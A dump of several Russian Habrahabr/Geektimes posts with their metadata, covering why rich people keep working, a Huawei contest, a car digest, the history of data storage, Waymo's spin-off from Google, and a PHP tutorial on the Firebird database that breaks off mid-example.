В течение года он и поступал так, как планировал: поехал путешествовать, позволял себе многое из того, что ранее считал недоступным. Но через год бизнесмен снова начал поиск работы — и уже вовсе не потому, что она ему была нужна для «поддержания штанов». Как раз со штанами не было никаких проблем — ими был забит гардероб, вместе с пиджаками, галстуками и большим количеством другой одежды.
«Я почувствовал себя несчастным из-за отсутствия цели в жизни. Мои знания и опыт деформировались, навыки уходили, поэтому мне стало сложно взаимодействовать с другими людьми на интеллектуальном уровне», — рассказал предприниматель BBC. Именно по этой причине он решил снова начать работать.
Ему удалось продолжить трудовую деятельность, и сейчас он счастливее, чем тогда, когда путешествовал без цели и смысла.
Но почему? Ведь для многих людей деньги — основная цель работы, во всяком случае, работают ради денег сотни миллионов человек. Если не будет необходимости задумываться о том, на что жить завтра, зачем работать? Но, оказывается, есть у человека потребность в том, чтобы быть востребованным, нужным кому-то. Ну или потребность в том, чтобы в жизни была какая-то цель. Ведь не зря же десятки миллиардеров продолжают работать: Джефф Безос, Марк Цукерберг, Билл Гейтс, Ричард Брэнсон и многие другие — яркий тому пример.
Специалисты, изучавшие вопрос связи денег, получаемых за работу и удовлетворения от работы, выяснили, что эта связь очень слабая. Специалисты из Флоридского университета утверждают , что наложение зон «удовлетворение от работы» и «заработная плата» составляет не более 2%. Другими словами, человек может быть доволен своим рабочим местом и с удовольствием выполнять свои обязанности вовсе не потому, что ему много платят.
Все дело в том, что саму работу мы воспринимаем, как нечто само собой разумеющееся. Но люди, по словам Джейми Траегера-Муни (Jamie Traeger-Muney), основателя Wealth Legacy Group, не понимают, что работа вовсе не обязательно будет у нас завтра, послезавтра или через год.
Джейми говорит, что 98% ее клиентов работают и после того, как становятся финансово независимыми. Для многих продолжать работать означает оставаться в зоне комфорта, выполняя привычные действия каждый день.
«Деньги — гораздо меньший критерий счастья и удовлетворения от работы, чем принято считать», — говорит она. На самом деле, существует большая разница между тем, что мы думаем о своей работе и деньгах, и тем, как обстоит дело в реальности.
Одна из причин этого — социальный статус и востребованность человека, как специалиста. Многие годы некоторые люди чувствуют себя нужными, они знают, что из себя представляют, знают, как к ним относятся окружающие. И вдруг все это теряется, поскольку человек уходит с рабочего места и больше ни от чего не зависит. Зато возникает вопрос: «А что делать дальше?». Возвращение к работе или же продолжение трудовой деятельности — простой способ не терять собственную идентификацию, как профессионала.
«Мы теряем статус, когда прекращаем работать, и это касается не только работы, но и социума», — говорит Джейми. И здесь ситуация равна для человека, который ушел с работы, поскольку ему уже не нужны деньги и для человека, который является безработным, и у которого денег нет. Оба чувствуют себя не в своей тарелке. Конечно, первому немного комфортнее, но проблема потеря статуса, как ценного специалиста все равно остается. Работа помогает получить и удерживать некий социальный статус. Отсутствие работы означает утерю этого статуса.
«Людям нравится быть востребованными, им приносит удовольствие то, что они могут побеждать», — говорит Карен Гордон, предприниматель из Техаса, которая заработала много денег, но продолжает работать.
Даже факт получения большого количества денег не поможет выйти из депрессии человеку, который привык к своей работе, и который эту работу по той или иной причине потерял. Депрессия в некоторых случаях затягивается на несколько месяцев. Зачастую, даже отдых в комфортабельном месте не приносит радости.
Здесь может помочь установка новых целей в жизни и профессиональной деятельности. Если человек достиг «потолка», то можно пойти дальше, и установить новые цели, что поможет с удовольствием работать и дальше. Все сказанное выше подтверждается и опытом представителей бизнеса, и опытом представителей ИТ-сферы.
Для многих богатых людей работа приносит особенное удовлетворение, которое нельзя сравнивать с наслаждением от отдыха в комфортабельном отеле или общении с другими людьми. С этим можно не соглашаться, но десятки тысяч богатых людей, которые работают, несмотря ни на что, подтверждают сказанное. | https://geektimes.ru/post/283658/ |
habrahabr | Новогодний квест «До связи!» | ['Конкурс', 'huawei', 'новогодний квест'] |
Мы запустили новогодний квест «До связи!» в официальном сообществе Huawei Russia «ВКонтакте».
В нем инженер связи Андрей отправляется из Магадана в Москву, чтобы проложить кабель и сделать... |
Мы запустили новогодний квест «До связи!» в официальном сообществе Huawei Russia «ВКонтакте».
В нем инженер связи Андрей отправляется из Магадана в Москву, чтобы проложить кабель и сделать ближе самые отдаленные города России.
Следите за приключениями героя Huawei, участвуйте, помогайте ему проходить испытания и выиграйте приз!
Самый активный участник получит смартфон Honor 8! Все подробности — тут . | https://habrahabr.ru/company/huawei/blog/317568/ |
habrahabr | Автомобильный дайджест: Что почитать, посмотреть и послушать в новогодние праздники | ['автомобили', 'технологии', 'автопилот', 'советы'] |
Приближаются праздничные дни, после которых наступают продолжительные выходные. Поэтому я решил подготовить для вас предновогодний список интересных материалов и новостей на автомобильную... |
Приближаются праздничные дни, после которых наступают продолжительные выходные. Поэтому я решил подготовить для вас предновогодний список интересных материалов и новостей на автомобильную тематику, чтобы было что почитать или посмотреть с кружкой какао вечерком. Законы, штрафы и реформы О парковке в столице О подорожании парковки в центре Москвы и о том, сколько теперь нужно потратить денег, чтобы парковаться в столице. Используя статистику своей истории парковок, пользователь drive2 рассчитал среднегодовую стоимость своей парковки по старым тарифам и сравнил с тем, что получится с удорожанием парковочных мест. Оплата штрафов через Apple Pay Как работает новый сервис, какие модели смартфонов поддерживают эту технологию и какие карты можно привязывать к приложению. Госдума не успевает реформировать ОСАГО О судьбе перехода на натуральную форму компенсации. Авторы законопроекта всё ещё обещают успеть доработать его до конца года. Законопроект уже поддержали и Минфин, и Центробанк, но теперь внезапно против него выступили депутаты «Единой России». Сотрудники ДПС получат персональные видеорегистраторы Теперь все их действия, разговоры и решения будут записываться. Наличие устройств, в первую очередь, призвано искоренить коррупцию, поэтому «решить проблему на месте» теперь не получится. Технологии Как избежать эвакуации автомобиля Статья об одном очень полезном приложении. Пока оно платное, по подписке, но его авторы весьма смело предлагают вернуть деньги за эвакуацию авто в том случае, если оповещение не пришло. Штраф, правда, они оплачивать не будут. Видео: Работа нового автопилота от Tesla Илон Маск продолжает толкать прогресс вперед. Автопилот компании протестировали в условиях города, в ролике также видно, как работает ПО — распознавание пешеходов, препятствий и встречных машин. Почему телематика не взлетит Подкаст о новинках в сфере страхования и телематических технологиях, а также об их проблемах в нашей стране, а также об инициативе государства по обязательному оснащению телематикой всех новых машин. Самый быстрый электромобиль в мире Компания NextEV показала концепт NIO EP9, который прошёл трассу Поль Рикар за рекордные 1 минуту 52,78 секунды и разгоняется до 200 км/ч за 7,1 секунды. Обзор отечественных видеорегистраторов AdvoCam На рынке видорегистраторов конкуренция высока, причём существуют как бюджетные варианты, так и «коробочки» подороже. Этот материал рассказывает о ситуации на отечественном рынке. Ключевые особенности российского видеорегистратора, процесс производства, технические характеристики, в чём отличие от других российских брендов. Первая в России заправка электромобилей от солнечной энергии Как проводились расчёты и проектирование, какое оборудование используется, как это работает. А также подробный фотоотчёт и пошаговое описание запуска проекта. Автострахование Можно ли получить страховку, если машина «намокла» Российская Газета о том, как страдают автомобилисты от участившихся потопов. Особенно актуально сейчас, когда нестабильная погода и резкие заморозки со снегопадом сменяются потеплением, а ливневая система в городах нормально не работает. Как сэкономить на КАСКО В этом материале рассказывается об «антикризисных» страховых программах и о том, как получить полис КАСКО за меньшие деньги. От каких дополнительных услуг отказаться, что такое договор с франшизой и как гаджеты помогают сэкономить. Какие поправки в закон об ОСАГО внесены в 2016 году Подборка материалов от Российской Газеты по последним изменениям в ОСАГО. Основное внимание сейчас сосредоточено на реформе ОСАГО, которая предполагает введение натуральной компенсации, но кроме этого изменения коснулись и европротокола, и полисов старого образца. После ДТП: как оценивают ущерб автомобиля Основной вопрос, который волнует водителя после любого ДТП — это размер повреждений. Разбор того, какую диагностику проводят эксперты. Терра Мобиле В подкастах этого проекта ведутся беседы на автомобильные и околоавтомобильные темы. Много внимания уделяется современным реалиям на рынке автострахования. Об июньских нововведениях О том, что ещё изменилось в автостраховании летом уходящего года. Что из нововведений можно считать хорошими переменами, а что — не очень, а также о некоторых инициативах, которые до сих пор не реализованы. Лайфхаки и советы Народный тест-драйв Подкаст с различными советами для автомобилистов. Как водить машину в разные сезоны? Как купить хороший поддержанный автомобиль? Какое детское автокресло выбрать? Зимнее вождение: 8 нюансов, о которых нужно помнить Материал о том, как ухаживать за машиной зимой, о чём не стоит забывать и что иметь в своём багажнике, как вытащить машину из кювета, что делать с «умными системами». Это, конечно, «старая песня о главном», но каждую зиму эти нюансы становятся актуальными. Как не уснуть за рулём: советы дальнобойщика Зимой эта тема становится особенно актуальной, когда водители уезжают на каникулы в долгие путешествия. Ледяной сок, запах лимона и ещё несколько полезных советов. В комментариях к статье отдельно обращают внимание на гаджет Safe Driver, который крепится к уху и при резком наклоне головы вперед подает сигнал. Как «прикурить» автомобиль Видеоразбор от авто.mail.ru. Несмотря на то, что тема популярная, и написано про неё немало материалов, на дорогах всё ещё можно встретить водителей, которые понятия не имеют, как это делается, поэтому освежим материал к наступающим морозным праздникам. Тест-драйвы Большой тест-драйв Один из самых популярных каналов про автомобили от Сергея Стиллавина и Рустама Вахидова с хорошим юмором. Тест-драйвы на Drive2 Хорошая подборка тест-драйвов с подробным разбором всех нюансов и фотоотчётами. Autowave Подкаст с самыми свежими новостями по автотеме. Новинки, лучшие автомобили, распродажи, обзоры. The Grand Tour Шоу от легендарных Джереми Кларксона, Джеймса Мэя и Ричарда Хаммонда, бывших ведущих шоу Top Gear, которое стартовало на Amazon Prime. Авто Тайм На этом канале можно найти различные обзоры, рейтинги и анти-рейтинги, сравнение машин, факты и многое другое. AcademeG Автокритик Константин делится своим субъективным взглядом на автомобильный мир. Множество интересных проектов, и еще больше жогова. | https://geektimes.ru/post/283674/ |
habrahabr | Обработка и хранение данных: от древности до ЦОДов | ['хранение данных', 'хранилища данных', 'история ит', 'safedata', 'серверы'] | Наше время часто называют информационным веком. Однако информация была критически важна для рода человеческого на протяжении всего его существования. Человек никогда не был самым быстрым, самым... | Наше время часто называют информационным веком. Однако информация была критически важна для рода человеческого на протяжении всего его существования. Человек никогда не был самым быстрым, самым сильным и выносливым животным. Своим положением в пищевой цепи мы обязаны двум вещам: социальности и способности передавать информацию более чем через одно поколение.
То, как информация хранилась и распространялась сквозь века, продолжает оставаться буквально вопросом жизни и смерти: от выживания племени и сохранения рецептов традиционной медицины до выживания вида и обработки сложных климатических моделей.
Посмотрите на инфографику (кликабельна для просмотра в полной версии). Она отображает эволюцию устройств хранения данных, и масштабы действительно впечатляют. Однако эта картинка далека от совершенства — она охватывает каких-то несколько десятилетий истории человечества, уже живущего в информационном обществе. А между тем данные накапливались, транслировались и хранились с того момента, откуда нам известна история человечества. Сперва это была обычная человеческая память, а в недалёком будущем мы уже ждём хранения данных в голографических слоях и квантовых системах. На Хабре уже неоднократно писали про историю магнитных накопителей, перфокарты и диски размером с дом. Но ещё ни разу не было проделано путешествие в самое начало, когда не было железных технологий и понятия данных, но были биологические и социальные системы, которые научились накапливать, сохранять, транслировать информацию. Попробуем сегодня прокрутить всю историю в рамках одного поста. Источник изображения: Flickr До изобретения письменности
До того, как появилось то, что можно без сомнения назвать письменностью, основным способом сохранить важные факты была устная традиция. В такой форме передавались социальные обычаи, важные исторические события, личный опыт или творчество рассказчика. Эту форму сложно переоценить, она продолжала процветать вплоть до средних веков, далеко после появления письменности. Несмотря на неоспоримую культурную ценность, устная форма — эталон неточности и искажений. Представьте себе игру в «испорченный телефон», в которую люди играют на протяжении нескольких столетий. Ящерицы превращаются в драконов, люди обретают песьи головы, а достоверную информацию о быте и нравах целых народностей невозможно отличить от мифов и легенд. Боян От клинописи до печатного станка
Для большинства историков рождении цивилизации с большой буквы неотрывно связано с появлением письменности. Согласно распространенным теориям, цивилизация в современном ее понимании появляется в результате создания излишков пищи, разделения труда и появления торговли. В долине Тигра и Евфрата произошло именно это: плодородные поля дали почву торговле, а коммерция, в отличии от эпоса, требует точности. Было это примерно в 2700 г. до нашей эры, то есть 4700 лет назад. Львиная доля шумерских табличек с клинописью заполнены бесконечным рядом торговых транзакций. Не все, конечно, так банально, например, расшифровка шумерской клинописи сохранила для нас старейшую на данный момент литературную работу — «Эпос о Гильгамеше». Глиняная табличка с клинописью
Клинопись, определенно, была отличным изобретением. Глиняные таблички неплохо сохранились, что уж говорить о клинописи, выбитой на камне. Но у клинописи есть однозначный минус — скорость, и физический (не в мегабайтах) вес итоговых «документов». Представьте, что вам нужно срочно написать и доставить несколько счетов в соседний город. С глиняными табличками такая работа может стать в буквальном смысле неподъемной.
Во многих странах, от Египта до Греции, человечество искало способы быстро, удобно и надежно фиксировать информацию. Все больше люди приходили к той или иной вариации тонких листов органического происхождения и контрастных «чернил». Это решало проблему с со скоростью и, так сказать, «емкостью» на килограмм веса. Благодаря пергаменту, папирусу и, в конечном счете, бумаге человечество получило свою первую информационную сеть: почту.
Однако, с новыми преимуществами пришли новые проблемы: все, что написано на материалах органического происхождения имеет свойство разлагаться, выцветать, да и просто гореть. В эпоху от темных веков вплоть до изобретения печатного пресса большим и важным делом было копирование книг: буквальное переписывание набело, буква за буквой. Если представить сложность и трудоемкость этого процесса, легко понять, почему чтение и письмо оставались привилегией очень узкой прослойки монашества и знатных людей. Однако в середине пятнадцатого века произошло то, что можно назвать Первой Информационной Революцией. От Гутенберга до лампы
Попытки упростить и ускорить набор текста с помощью комплектов заранее отлитых словоформ или букв и ручного пресса предпринимали еще в Китае в 11 веке. Почему же мы мало знаем об этом и привыкли считать родиной печати Европу? Распространению наборной печати в Китае помешала их собственная сложная письменность. Производство литер для полноценной печати на китайском было слишком трудоемким.
Благодаря Гутенбергу же, у книг появилось понятие экземпляра. Библия Гутенберга была отпечатана 180 раз. 180 копий текста, и каждая копия повышает вероятность, что пожары, наводнения, ленивые переписчики, голодные грызуны не будут помехой для будущих поколений читателей. Печатный станок Гутенберга
Ручной пресс и ручной подбор литер, однако, не являются, конечно, оптимальным по скорости и трудозатратам процессом. С каждым столетием человеческое общество стремилось не только найти способ сохранить информацию, но и распространить ее как можно более широкому кругу лиц. С развитием технологий, эволюционировала как печать, так и производство копий.
Ротационная печатная машина была изобретена в конце девятнадцатого века, и ее вариации используются вплоть до сегодняшнего дня. Эти махины, с непрерывно вращающимися валами, на которых закреплены печатные формы, были квинтэссенцией индустриального подхода и символизировали очень важный этап в информационном развитии человечества: информация стала массовой, благодаря газетам, листовкам и подешевевшим книгам.
Массовость, однако, не всегда идет на пользу конкретному кусочку информации. Основной носитель, бумага и чернила, все так же подвержены износу, ветхости, утере. Библиотеки, полные книг по всем возможным областям человеческих знаний, становились все более объемны, занимая огромные пространства и требуя все больше ресурсов для своего обслуживания, каталогизации и поиска.
Очередной сдвиг парадигмы в сфере хранения информации произошел после изобретения фотопроцесса. Нескольким инженерам пришла в голову светлая мысль, что миниатюрные фотокопии технических документов, статей и даже книг могут продлить исходникам жизнь и сократить необходимое для их хранения место. Получившиеся в результате подобного мыслительного процесса микрофильмы (миниатюрные фотографии и оборудование для их просмотра) вошли в обиход в финансовых, технических и научных кругах в 20-х годах двадцатого века. У микрофильма много плюсов — этот процесс сочетает в себе легкость копирования и долговечность. Казалось, что развитие способов хранения информации достигло своего апогея. Микроплёнка, используется до сих пор От перфокарт и магнитных лент к современным ЦОДам
Инженерные умы пытались придумать универсальный метод обработки и хранения информации еще с 17-го века. Блез Паскаль, в частности, заметил, что если вести вычисления в двоичной системе счисления, то математические закономерности позволяют привести решения задач в такой вид, который делает возможным создание универсальной вычислительной машины. Его мечта о такой машине осталась лишь красивой теорией, однако, спустя века, в середине 20-го века, идеи Паскаля воплотились в железе и породили новую информационную революцию. Некоторые считают, что она все еще продолжается.
То, что сейчас принято называть «аналоговыми» методами хранения информации, подразумевает, что для звука, текста, изображений и видео использовались свои технологии фиксации и воспроизведения. Компьютерная память же универсальна — все, что может быть записано, выражается с помощью нулей и единиц и воспроизводится с помощью специализированных алгоритмов. Самый первый способ хранения цифровой информации не отличался ни удобством, ни компактностью, ни надежностью. Это были перфокарты, простые картонки с дырками в специально отведенных местах. Гигабайт такой «памяти» мог весить до 20 тонн. В такой ситуации сложно было говорить о грамотной систематизации или резервном копировании. Перфокарта
Компьютерная индустрия развивалась стремительно и быстро проникала во все возможные области человеческой деятельности. В 50-х годах инженеры «позаимствовали» запись данных на магнитную ленту у аналоговой аудио и видеозаписи. Стримеры с кассетами объемом до 80 Мб использовались для хранения и резервного копирования данных вплоть до 90-х годов. Это был неплохой способ с относительно продолжительным сроком хранения (до 50 лет) и небольшим размером носителя? Кроме того, удобство их использования и стандартизация форматов хранения данных ввела понятие резервного копирования в бытовой обиход. Один из первых жёстких дисков IBM, 5 МБ
У магнитных лент и систем, связанных с ними, есть один серьезный недостаток — это последовательный доступ к данным. То есть, чем дальше запись находится от начала ленты, тем больше времени потребуется для того, чтобы ее прочитать.
В 70-х годах 20-го века был произведен первый «жесткий диск» (HDD) в том формате, в котором он знаком нам сегодня — комплект из нескольких дисков с намагничивающимся материалом и головками для чтения/записи. Вариации этой технологии используются и сегодня, постепенно уступая в популярности твердотельным накопителям (SSD). Начиная с этого момента, в течении всего компьютерного бума 80-х формируются основные парадигмы хранения, защиты и резервного копирования информации. Благодаря массовому распространению бытовых и офисных компьютеров, не обладающих большим объемом памяти и вычислительной мощности, укрепилась модель «клиент-сервер». По началу «сервера» были по большей части локальными, своими для каждой организации, института или фирмы. Не было какой-то системы, правил, информация дублировалась в основном на дискеты или магнитные ленты.
Появление интернета, однако, подстегнуло развитие систем хранения и обработки данных. В 90-х годах, на заре «пузыря доткомов» начали появляться первые дата-центры, или ЦОД-ы (центры обработки данных). Требования к надежности и доступности цифровых ресурсов росли, вместе с ними росла сложность их обеспечения. Из специальных комнат в глубине предприятия или института дата-центры превратились в отдельные здания со своей хитрой инфраструктурой. В то же время, у ЦОД-ов кристаллизовалась своего рода анатомия: сами компьютеры (серверы), системы связи с интернет-провайдерами и все, что касается инженерных коммуникаций (охлаждение, системы пожаротушения и физического доступа в помещения).
Чем ближе к сегодняшнему дню, тем больше мы зависим от данных, хранящихся где-то в «облаках» ЦОД-ов. Банковские системы, электронная почта, онлайн-энциклопедии и поисковые движки — все это стало новым стандартом жизни, можно сказать, физическим продолжением нашей собственной памяти. То, как мы работаем, отдыхаем и даже лечимся, всему этому можно навредить простой утерей или даже временным отключением от сети. В двухтысячных годах были разработаны стандарты надежности дата центров, от 1-го до 4-го уровня.
Тогда же из космической и медицинской отраслей начали активно проникать технологии резервирования. Конечно, копировать и размножать информацию с тем, чтобы защитить ее в случае уничтожения оригинала люди умели давно, но именно дублирование не только носителей данных, но и различных инженерных систем, а также необходимость предусматривать точки отказала и возможных человеческих ошибок отличает серьезные ЦОДы. Например, ЦОД, принадлежащий к Tier I будет лишь ограниченную избыточность хранения данных. В требования к Tier II уже прописано резервирование источников питания и наличие защиты от элементарных человеческих ошибок, а Tier III предусматривает резервирование всех инженерных систем и защиту от несанкционированного проникновения. Наконец, высший уровень надежности ЦОДа, четвертый, требует дополнительное дублирование всех резервных систем и полное отсутствие точек отказа. Кратность резервирования (сколько именно резервных элементов приходится на каждый основной) обычно обозначается буквой M. Со временем требования к кратности резервирования только росли.
Построить ЦОД уровня надежности TIER-III, — это проект, с которым справится только исключительно квалифицированная компания. Такой уровень надежности и доступности означает, что, как инженерные коммуникации, так и системы связи дублированы, и дата-центр имеет право на простой только в количестве около 90 минут в год.
У нас в Safedata такой опыт есть: в январе 2014 года в рамках сотрудничества с Российским Научным Центром «Курчатовский Институт» нами был введен в эксплуатацию второй дата-центр SAFEDATA — Москва-II, который также отвечает требованиям уровня TIER 3 стандарта TIA-942, ранее же (2007-2010) мы построили дата-центр Москва-I, который отвечает требованиям уровня TIER 3 стандарта TIA-942 и относится к категории центров хранения и обработки данных с защищенной сетевой инфраструктурой.
Мы видим, что в IT происходит еще одна смена парадигмы, и связана она с data science. Обработка и хранение больших объемов данных становятся актуальны как никогда. В каком-то смысле, любой бизнес должен быть готов стать немного учеными: вы собираете огромное количество данных о ваших клиентах, обрабатываете их и получаете для себя новую перспективу. Для реализации таких проектов потребуется аренда большого количества мощных серверных машин и эксплуатация будет не самой дешевой. Либо, возможно, ваша внутренняя ИТ-система настолько сложна, что на поддержание ее уходит слишком много ресурсов компании.
В любом случае, для каких бы целей вам не понадобились значительные вычислительные мощности, у нас есть услуга «Виртуального ЦОДа». Инфраструктура как сервис — не новое направление, однако мы выгодно отличаемся целостным подходом, начиная от специфически ИТ-шных проблем, вроде переноса корпоративных ресурсов в «Виртуальный ЦОД», до юридических, таких как консультация по актуальному законодательству РФ в сфере защиты данных.
Развитие информационных технологий похоже на беспощадно несущийся вперед поезд, не все успевают запрыгнуть в вагон когда им предоставляется возможность. Где-то до сих пор используют бумажные документы, в старых архивах хранятся сотни не оцифрованных микрофильмов, государственные органы могут до сих пор использовать дискеты. Прогресс никогда не бывает линейно-равномерным. Никто не знает, сколько важных вещей мы в результате навсегда потеряли и какое количество часов было потрачено из-за до сих пор не вполне оптимальных процессов. Зато мы в Safedata знаем, как не допустить пустых трат и невосполнимых потерь конкретно в вашем случае. | https://habrahabr.ru/company/safedata/blog/317574/ |
habrahabr | Беспилотные автомобили Google получили юридическое лицо: Waymo | ['Google', 'Alphabet', 'Waymo', 'беспилотный автомобиль', 'робоавтомобиль', 'Tesla', 'Uber', 'Apple', 'ДТП'] |
Прототип беспилотного автомобиля Waymo
Проекту создания робоавтомобилей Google пошёл седьмой год, он давно перерос стадию эксперимента. Это очень перспективный бизнес. Буквально несколько дней... | Прототип беспилотного автомобиля Waymo
Проекту создания робоавтомобилей Google пошёл седьмой год, он давно перерос стадию эксперимента. Это очень перспективный бизнес. Буквально несколько дней назад первый штат США разрешил продажу серийных беспилотных автомобилей и их коммерческую эксплуатацию , в том числе в режиме беспилотного такси по вызову.
Пришло время переходить от научных исследований и тестов к коммерческой эксплуатации, тем более что финансовый директор Alphabet недавно ужал финансирование исследовательских проектов Google . Всё должно приносить прибыль. Вчера корпорация Alphabet объявила о выделении проекта беспилотных автомобилей в отдельную независимую компанию. Компания получила название Waymo .
По мнению экспертов, формирование отдельного юридического лица для проекта беспилотных автомобилей указывает на желание владельцев наконец-то монетизировать свои ценные научные исследования. Способы монетизации могут быть разные, например, лицензирование интеллектуальной собственности. Но очень вероятно, что компания Google (точнее, Waymo) вплотную приблизилась к выпуску коммерческих робоавтомобилей.
В этой области Waymo придётся столкнуться с жёсткой конкуренцией от нескольких компаний, которые тоже ведут разработки в области беспилотных автомобилей и, в том числе, намерены организовать беспилотные таксопарки в крупных городах США. Конечно, в первую очередь это компании Tesla Motors и Uber. Те уже готовятся к конкуренции между собой. Так, в лицензионном соглашении для полного автопилота Tesla прямо указано , что владелец обязуется не отправлять свой автопилот работать в парк конкурента, а использовать только в беспилотной сети Tesla Networks. В сентябре 2016 года Uber начала первые тесты беспилотных такси в Питтсбурге . Дисплей беспилотного автомобиля Uber с монитором машинного зрения в ходе испытаний в Питтсбурге, 12 сентября 2016 года. Фото: Jeff Swensen / The New York Times
Ещё одним потенциальным конкурентом называют Apple, которая тоже ведёт разработку беспилотного автомобиля, бросив на этот проект сотни инженеров .
«[Образование отдельного юридического лица] — это указание на зрелость нашей технологии, сказал исполнительный директор новой компании Джон Крафчик (John Krafcik) вчера на пресс-конференции в Сан-Франциско. — Мы можем представить, что наша беспилотная технология используется во всех областях… [Данный шаг демонстрирует] уверенность, что мы близки к выводу этой [технологии] на массовый рынок. Мы достигли своеобразной точки перегиба».
Джон Крафчик пришёл в компанию в августе 2015 года, до этого был топ-менеджером Hyundai Motor.
До настоящего времени программа беспилотных автомобилей была относительным секретным исследовательским подразделением внутри Google X. Сейчас всё изменится. Пришло время для коммерческой работы. Исполнительный директор пообещал «скоро» определить сроки, когда именно технология будет готова к выходу на массовый рынок. Он несколько раз подчеркнул, что компания не заинтересована в производстве автомобилей, а только в разработке технологий для автопилота. Возможными применениями автопилота могут быть совместное использование (ride-sharing), пассажирские автоперевозки, грузоперевозки, транспорт, логистика, а также использование для личных нужд. В производстве машин Waymo помогут партнёры. Первым из них стала компания Fiat Chrysler, с которой в мае 2016 года заключено соглашение на оснащение автопилотом первой сотни микроавтобусов Fiat Chrysler.
Название Waymo является сокращением от фразы "A new way forward in mobility", сказал Крафчик.
С 2009 года автомобили Google/Alphabet наездили в беспилотном режиме 3,7 млн км на дорогах общественного пользования и тестовых полигонах в Калифорнии, Аризоне, Техасе и Вашингтоне, а также более 1,6 млрд км в режиме компьютерной симуляции (в 2016 году). Сейчас проходит обкатка машин в самых сложных сценариях, с которыми может столкнуться робоавтомобиль в реальных дорожных условиях. На дорогах общего пользования испытывают около 60 автомобилей Google (теперь уже автомобилей Waymo).
В прошлом году Google расширила программу разработки беспилотников, увеличила штат инженеров и удвоила количество испытательных центров для тестирования автомобилей в США с двух до четырёх. Для разработки плана монетизации в августе 2016 года был приглашён на работу бывший руководитель Airbnb Шон Стюарт (Shaun Stewart) на должность директора. Месяцем ранее компания ввела должность юридического директора и впервые назначила главного юриста для этого проекта. Директором по технологиям в компании Waymo стал Дмитрий Долгов , выпускник МФТИ 2000 года.
Итак, шаг за шагом мы становимся всё ближе к будущему, когда человек за рулём автомобиля будет выглядеть архаично, вызывая только страх у окружающих. Сейчас аварии на дорогах уносят больше жизней, чем все войны и терроризм. Ущерб экономике от ДТП сравним с общими расходами на здравоохранение . Каждый год в ДТП погибает около 1,4 млн человек . | https://geektimes.ru/post/283682/ |
habrahabr | Создание web приложения на PHP с иcпользованием Firebird и Laravel | ['Firebird', 'PHP', 'Laravel'] | Привет Хабр!
В прошлой статье я рассказывал о пакете для поддержки СУБД Firebird в фреймворке Laravel. На этот раз мы рассмотрим процесс создания web приложения с использованием СУБД Firebird... | Привет Хабр!
В прошлой статье я рассказывал о пакете для поддержки СУБД Firebird в фреймворке Laravel. На этот раз мы рассмотрим процесс создания web приложения с использованием СУБД Firebird на языке PHP с использованием Laravel. Обзор драйверов для работы с Firebird
В PHP есть два драйвера для работы с СУБД Firebird: Расширение Firebird/Interbase (ibase_ функции);
PDO драйвер для Firebird.
Обзор расширения Firebird/Interbase
Расширение Firebird/Interbase появилось раньше и является наиболее проверенным. Для установки расширения Firebird/Interbase в конфигурационном файле php.ini необходимо раскомментировать строку extension=php_interbase.dll
или для UNIX подобных систем строку extension=php_interbase.so
Это расширение требует, чтобы у вас была установлена клиентская библиотека fbclient.dll/gds32.dll (для UNIX подобных систем fbclient.so) соответствующей разрядности. Замечание для пользователей Win32/Win64
Для работы этого расширения системной переменной Windows PATH должны быть доступны DLL-файлы fbclient.dll или gds32.dll. Хотя копирование DLL-файлов из директории PHP в системную папку Windows также решает проблему (потому что системная директория по умолчанию находится в переменной PATH), это не рекомендуется. Этому расширению требуются следующие файлы в переменной PATH: fbclient.dll или gds32.dll.
В Linux это расширение в зависимости от дистрибутива можно установить одной из следующих команд (необходимо уточнить поддерживаемые версии, возможно, необходимо подключить сторонний репозиторий): apt-get install php5-firebird
rpm –ihv php5-firebird
yum install php70w-interbase
zypper install php5-firebird
Это расширение использует процедурный подход к написанию программ. Функции с префиксом ibase_ могут возвращать или принимать в качестве одного из параметров идентификатор соединения, транзакции, подготовленного запроса или курсора (результат SELECT запроса). Этот идентификатор имеет тип resource. Все выделенные ресурсы необходимо освобождать, как только они больше не требуются. Я не буду описывать каждую из функций подробно, вы можете посмотреть их описание по ссылке, вместо этого приведу несколько небольших примеров с комментариями. $db = 'localhost:example';
$username = 'SYSDBA';
$password = 'masterkey';
// Подключение к БД
$dbh = ibase_connect($db, $username, $password);
$sql = 'SELECT login, email FROM users';
// Выполняем запрос
$rc = ibase_query($dbh, $sql);
// Получаем результат построчно в виде объекта
while ($row = ibase_fetch_object($rc)) {
echo $row->email, "\n";
}
// Освобождаем хэндл связанный с результатом запроса
ibase_free_result($rc);
// Освобождаем хэндл связанный с подключением
ibase_close($dbh);
Вместо функции ibase_connect вы можете применять функцию ibase_pconnect, которая создаёт так называемые постоянные соединения. В этом случае при вызове ibase_close соединение не закрывается, все связанные с ней ресурсы освобождаются, транзакция по умолчанию подтверждается, другие виды транзакций откатываются. Такое соединение может быть использовано повторно в другой сессии, если параметры подключения совпадают. В некоторых случаях постоянные соединения могут значительно повысить эффективность вашего веб приложения. Это особенно заметно, если затраты на установку соединения велики. Они позволяют дочернему процессу на протяжении всего жизненного цикла использовать одно и то же соединение вместо того, чтобы создавать его при обработке каждой страницы, которая взаимодействует с SQL-сервером. Этим постоянные соединения напоминают работу с пулом соединений. Подробнее о постоянных соединениях вы может прочитать по ссылке . Внимание!
Многие ibase функции позволяют не передавать в них идентификатор соединения (транзакции, подготовленного запроса). В этом случае эти функции используют идентификатор последнего установленного соединения (начатой транзакции). Я не рекомендую так делать, в особенности, если ваше веб приложение может использовать более одного подключения.
Функция ibase_query выполняет SQL запрос и возвращает идентификатор результата или true, если запрос не возвращает набор данных. Эта функция помимо идентификатора подключения (транзакции) и текста SQL запроса может принимать переменное число аргументов в качестве значений параметров SQL запроса. В этом случае наш пример выглядит следующим образом: $sql = 'SELECT login, email FROM users WHERE id=?';
$id = 1;
// Выполняем запрос
$rc = ibase_query($dbh, $sql, $id);
// Получаем результат построчно в виде объекта
if ($row = ibase_fetch_object($rc)) {
echo $row->email, "\n";
}
// Освобождаем хэндл связанный с результатом запроса
ibase_free_result($rc);
Очень часто параметризованные запросы используются многократно с различным набором значений параметров, в этом случае для повышения производительности рекомендуется использовать подготовленные запросы. В этом случае сначала необходимо сначала получить идентификатор подготовленного запроса с помощью функции ibase_prepare, а затем выполнять подготовленный запрос с помощью функции ibase_execute. $sql = 'SELECT login, email FROM users WHERE id=?';
// Подготавливаем запрос
$sth = ibase_prepare($dbh, $sql);
$id = 1;
// Выполняем запрос
$rc = ibase_execute($sth, $id);
// Получаем результат построчно в виде объекта
if ($row = ibase_fetch_object($rc)) {
echo $row->email, "\n";
}
// Освобождаем хэндл связанный с результатом запроса
ibase_free_result($rc);
// Освобождаем подготовленный запрос
